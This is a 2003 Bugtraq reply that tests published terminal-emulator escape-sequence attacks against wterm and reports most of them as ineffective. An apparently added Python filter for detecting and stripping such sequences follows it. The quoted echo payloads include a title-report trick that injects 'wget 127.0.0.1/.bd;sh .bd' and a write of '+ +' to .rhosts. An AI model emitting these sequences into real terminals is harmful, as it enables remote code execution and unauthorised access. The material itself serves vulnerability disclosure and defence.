[29040] in bugtraq
Re: Terminal Emulator Security Issues
daemon@ATHENA.MIT.EDU (Juraj Ziegler)
Tue Feb 25 12:49:11 2003
Date: Tue, 25 Feb 2003 01:23:09 +0100
From: Juraj Ziegler <e@hq.sk>
To: H D Moore <termulation@digitaloffense.net>
Message-ID: <20030225002309.GA25687@hq.sk>
In-Reply-To: <200302241502.52947.termulation@digitaloffense.net>
Wterm was not mentioned throughout the article, so I decided to test it
quickly.
On Mon, Feb 24, 2003 at 03:02:52PM -0600, H D Moore wrote:
> $ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"
Does not work. Code 33 is not implemented, according to the
documentation, code 50 is used to change font [specifying movement in
the terminal's font list].
> $ echo -e "\e]2;This is the new window title\a"
Works.
> $ echo -e "\e[21t"
echo -e "\e]2;whoo\a"
echo -e "\e[21t"
Changes window title to 'whoo', but nothing is pasted -> does not work.
> $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
It can be deduced that this does not work either, and a quick test
proved it.
> $ echo -e "\eP0;0|0A/17\x9c"
Safe from this harm, over here.
> $ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"
Besides a weird output from echo itself [as not all characters were
handled by the terminal], nothing.
The output is: :]itd
As to wterm's origin, it seems to be based on rxvt
<quote site="http://largo.windowmaker.org/files.php#wterm">
wterm started as a beta test of some additions Alfredo hoped to get
contributed to the official rxvt source tree.
</quote>
Version tested: 6.2.9 - latest (even though released in 8/2001)
[e]
-- 
_______________________________________________________________________________
>e@hq.sk< /(bb|[^b]{2})/ >http://hq.sk/~euro<
"always know what you say, but do not always say what you know"
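
A defensive take on the sequence families tested in this message, as an added example that is not part of the original post: a Python filter that strips escape sequences from untrusted text before it reaches a terminal and flags a title set followed by a title report. The function names, labels and sample string are constructed for illustration; 8-bit C1 introducers are not handled.

```python
import re

ESC = "\x1b"
END = r"(?:\x07|\x1b\\|\x9c)"  # string terminators: BEL, ESC \, 8-bit ST
# Tried in order at every ESC byte. Groups: (code or params, text or final byte).
PATTERNS = [
    ("osc", re.compile(r"\x1b\](\d*);?([^\x07\x1b\x9c]*)" + END)),  # \e]2;title\a
    ("dcs", re.compile(r"\x1bP()([^\x1b\x9c]*)" + END)),            # \eP...\x9c
    ("csi", re.compile(r"\x1b\[([0-9;?]*)([@-~])")),                # \e[21t
    ("esc", re.compile(r"\x1b()([0-Z\\^-~])")),                     # \ec
]

def classify(kind, a, b):
    if kind == "osc":  # OSC 0/1/2 set the window title and/or icon label
        return "set-title" if a in ("0", "1", "2") else "osc-" + (a or "?")
    if kind == "csi" and b == "t" and a in ("20", "21"):
        return "report-title"  # terminal is asked to send the label/title back as input
    return kind

def scan(data):
    """Return (findings, cleaned); every recognised sequence and stray ESC is removed."""
    findings, out, i = [], [], 0
    while i < len(data):
        m = None
        if data[i] == ESC:
            for kind, rx in PATTERNS:
                m = rx.match(data, i)
                if m:
                    findings.append(classify(kind, m.group(1), m.group(2)))
                    i = m.end()
                    break
        if m is None:
            if data[i] != ESC:  # an unterminated or unknown ESC is dropped silently
                out.append(data[i])
            i += 1
    return findings, "".join(out)

def title_echo_back(findings):
    """True when a title report is requested after a title has been set."""
    sets = [i for i, f in enumerate(findings) if f == "set-title"]
    reps = [i for i, f in enumerate(findings) if f == "report-title"]
    return bool(sets and reps and sets[0] < reps[-1])

# Constructed sample: the harmless title test from the message plus a DCS and a reset.
SAMPLE = "before \x1b]2;whoo\x07\x1b[21t after \x1bP0;0|0A/17\x9c\x1bc end"

if __name__ == "__main__":
    found, clean = scan(SAMPLE)
    print(found, title_echo_back(found), repr(clean))
```

Running `scan` over files, mail bodies or log lines before they are shown with `cat` or a pager gives both the cleaned text and a list of what was removed.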